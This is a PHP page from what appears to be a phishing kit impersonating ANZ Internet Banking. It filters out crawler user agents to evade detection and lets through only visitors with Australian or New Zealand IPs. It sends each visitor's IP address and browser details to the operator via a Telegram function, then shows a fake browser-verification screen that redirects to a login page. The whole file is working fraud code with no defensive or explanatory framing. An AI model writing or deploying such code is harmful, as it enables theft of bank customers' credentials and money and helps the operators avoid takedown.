<?php
session_start();
include 'telegram.php';

// Real IP detection (Cloudflare-compatible)
function getRealIP() {
    if (!empty($_SERVER['HTTP_CF_CONNECTING_IP'])) return $_SERVER['HTTP_CF_CONNECTING_IP'];
    if (!empty($_SERVER['HTTP_X_FORWARDED_FOR'])) return explode(',', $_SERVER['HTTP_X_FORWARDED_FOR'])[0];
    if (!empty($_SERVER['HTTP_CLIENT_IP'])) return $_SERVER['HTTP_CLIENT_IP'];
    return $_SERVER['REMOTE_ADDR'];
}

$ip = getRealIP();
$agent = $_SERVER['HTTP_USER_AGENT'] ?? 'Unknown';
$time = date("Y-m-d H:i:s");

// --- Bot Detection (basic User-Agent match) ---
$bots = ['googlebot','bingbot','slurp','duckduckbot','yandex','baiduspider','facebookexternalhit','crawler','spider','robot','crawling'];
$ua = strtolower($agent);
foreach ($bots as $bot) {
    if (strpos($ua, $bot) !== false) {
        header("Location: trap.php");
        exit;
    }
}

// --- GeoIP Country Check (using ipwho.is) ---
$geo = @json_decode(file_get_contents("http://ipwho.is/{$ip}"), true);
if (!$geo || $geo['success'] !== true || !in_array(strtoupper($geo['country_code']), ['AU', 'NZ'])) {
    header("Location: trap.php");
    exit;
}

// --- Visitor Session Tracking ---
if (!isset($_SESSION['visitor_id'])) {
    $_SESSION['visitor_id'] = uniqid('v_', true);
}

// --- Telegram Notification ---
$message = "👁️ ANZ Visit\nIP: $ip\nTime: $time\nAgent: $agent";
sendTelegram($message);
?>
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>ANZ Internet Banking</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: #f4f6f8;
      color: #333;
      text-align: center;
      padding-top: 100px;
    }
    .box {
      display: inline-block;
      background: white;
      padding: 30px;
      border-radius: 6px;
      box-shadow: 0 0 10px rgba(0,0,0,0.1);
    }
    button {
      background-color: #0077c8;
      color: white;
      border: none;
      padding: 12px 22px;
      font-size: 16px;
      border-radius: 4px;
      cursor: pointer;
    }
    button:hover {
      background-color: #005b9f;
    }
    small {
      color: #777;
    }
  </style>
  <script>
    // Auto redirect to login.php in 3 seconds if no interaction
    setTimeout(function() {
      window.location.href = 'login.php';
    }, 3000);
  </script>
</head>
<body>
  <div class="box">
    <h2>Welcome to ANZ Internet Banking</h2>
    <p>For your security, we are verifying your browser.</p>
    <form action="login.php" method="get">
      <button type="submit">Continue to Login</button>
    </form>
    <p><small>If you are not redirected automatically, click the button above.</small></p>
  </div>
</body>
</html>